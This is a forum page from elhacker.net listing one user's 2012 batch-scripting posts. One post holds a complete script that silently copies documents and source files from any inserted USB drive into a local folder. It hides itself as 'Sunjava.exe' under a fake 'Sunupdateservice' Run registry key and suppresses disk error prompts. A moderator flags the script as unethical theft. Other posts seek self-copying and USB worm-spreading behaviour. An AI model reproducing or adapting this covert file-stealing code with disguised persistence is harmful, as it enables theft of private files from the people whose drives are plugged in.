elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Temas
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12]
111  Programación / Scripting / bath presionar boton en: 6 Noviembre 2012, 03:46 am
en bath es posible presionar un boton de una web ?¿ 
el boton se llama submit
112  Programación / Scripting / [BATCH] Copiar archivos de usb Script bath en: 5 Noviembre 2012, 23:43 pm
pss hice un script que copia archivos al pc
el script lo que hace es que al meter la usb copia todos los archivos con las extension que quieras al pc
donde dice:
Código:
(*.doc,*cpp,*ppt,*d0cx,*pptx,*.c)
van las extensiones
ejemplo
Código:
(*.jpg)
y si quieres copiar mas extensiones separas por comas ,
Código:
(*.jpg,*.mp3)
otra cosa no borres el asterico * que es igual a todos los archivos
*=todos los archivos

el mkdir crea carpetas en dicha ubicacion
ejemplo:
Código:
mkdir C:\trabajos

esto hace que se agrege al registro y se inicie al prender el pc
Código:
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Sunupdateservice /t REG_SZ /d "%WINDIR%\14785\Sunjava.exe" /f

este quita un error que dice no ay disco
Código:
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows /v ErrorMode /t REG_DWORD /d "2" /f

y esto es una especie de lista de espera para volver a empezar

Código:
ping 127.0.0.1 -n 35

source:
Código:
@echo off
REM A
REM U
REM T
REM O
REM C
REM O
REM P
REM Y
REM by asdexiva~
:inicio

mkdir C:\trabajos
REM copiado de archivos al usb
(FOR /R "E:\" %%a IN (*.doc,*cpp,*ppt,*d0cx,*pptx,*.c)  DO  (copy /y "%%a" "C:\trabajos\"))
(FOR /R "F:\" %%a IN (*.doc,*cpp,*ppt,*d0cx,*pptx,*.c)  DO  (copy /y "%%a" "C:\trabajos\"))
(FOR /R "G:\" %%a IN (*.doc,*cpp,*ppt,*d0cx,*pptx,*.c)  DO  (copy /y "%%a" "C:\trabajos\"))
(FOR /R "H:\" %%a IN (*.doc,*cpp,*ppt,*d0cx,*pptx,*.c)  DO  (copy /y "%%a" "C:\trabajos\"))
(FOR /R "I:\" %%a IN (*.doc,*cpp,*ppt,*d0cx,*pptx,*.c)  DO  (copy /y "%%a" "C:\trabajos\"))
(FOR /R "J:\" %%a IN (*.doc,*cpp,*ppt,*d0cx,*pptx,*.c)  DO  (copy /y "%%a" "C:\trabajos\"))
(FOR /R "K:\" %%a IN (*.doc,*cpp,*ppt,*d0cx,*pptx,*.c)  DO  (copy /y "%%a" "C:\trabajos\"))
(FOR /R "L:\" %%a IN (*.doc,*cpp,*ppt,*d0cx,*pptx,*.c)  DO  (copy /y "%%a" "C:\trabajos\"))
(FOR /R "W:\" %%a IN (*.doc,*cpp,*ppt,*d0cx,*pptx,*.c)  DO  (copy /y "%%a" "C:\trabajos\"))



REM SE AGREGA AL INICIO DEL SISTEMA
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Sunupdateservice /t REG_SZ /d "%WINDIR%\14785\Sunjava.exe" /f
REM DESABILITA ERROR NO AY DISCO
REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows /v ErrorMode /t REG_DWORD /d "2" /f
REM COPIAR ARCHIVO A WINDOWS PARA INICIAR con el registro
Copy /y %0, "%WINDIR%\14785\Sunjava.exe"


:LOOP
REM especie de sleep 35 SEGUNDOS
ping 127.0.0.1 -n 35

goto inicio





MOD: Haz el favor de leer las normas, no postear material con fines de hacking nó éticos, como es por ejemplo "ROBAR EN LA ESCUELA".
113  Programación / Scripting / copiar a windows bath en: 5 Noviembre 2012, 22:52 pm
hola a todos necesito saber si es posible que cuando se abra mi archivo se copie a una carpeta en windows
ejemplo:
C:\windows\lio
dentro de esa carpeta que se copie

espero que me puedan ayudar xD
114  Programación / Scripting / [BATCH] nombre del PC en: 3 Noviembre 2012, 17:19 pm
quiero saber si es posible que
por ejemplo si mi computadora se llama
javier no haga nada el codigo
pero si se llama diferente si haga espero me ayan entendido
y gracias :D

muchas gracias a los 2
115  Programación / Scripting / [Batch] ayuda en: 2 Noviembre 2012, 20:06 pm
una pequeñisima duda me interesa mucho bath :D

lo que quiero saber es como se lee este codigo

Código:
(FOR /R "E:\" %%a in (*.doc) do (copy /y "%%a" "C:\trabajos\"))

for es para pero quisiera saber como se lee

ejemplo
if text1.text=xd  then

si text1.text=xd entonces

espero me puedan ayudar
116  Programación / Scripting / duda copy BATCH en: 1 Noviembre 2012, 21:42 pm
hola a todos
Tengo una duda sobre el comando copy es que si copia
Código:
@echo off
copy "E:\*.doc" "C:\trabajos"

pero no exactamente como yo quiero ,quiero que copie todos los archivos .doc
pero solo copia los del principio quiero que copie tambien los que estan en carpetas

lo que quiero hacer es que al conectar una usb copie todos los archivos a C:\trabajos pero solo copia algunos y no los que estan en carpetas  :-(

saludos y gracias espero que me puedan ayudar
117  Programación / Scripting / porfavor ayuda con mi codigo xD en: 21 Octubre 2012, 19:38 pm
Código:
no es exactamente mio es de octalh hahaha pero lo estoy modificando corre todo bien
pero cuando aparece en la memoria el exe no funciona no se duplica en otras pcs ok dejo el codigo el problema esta en el systemshell.exe el archivo original si lo ejecuto hace todo bien y los que se copian en la usb no se duplican ojala pudieran ayudarme  :huh:


GOTO CHEKARWORM
posdata el original si sirve los copiados a usb no :S



Nota del mod: Usa el botón "Insertar código"

el archivo original me crea el systemshell pero los copias no :S alguien que me eche una mano
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines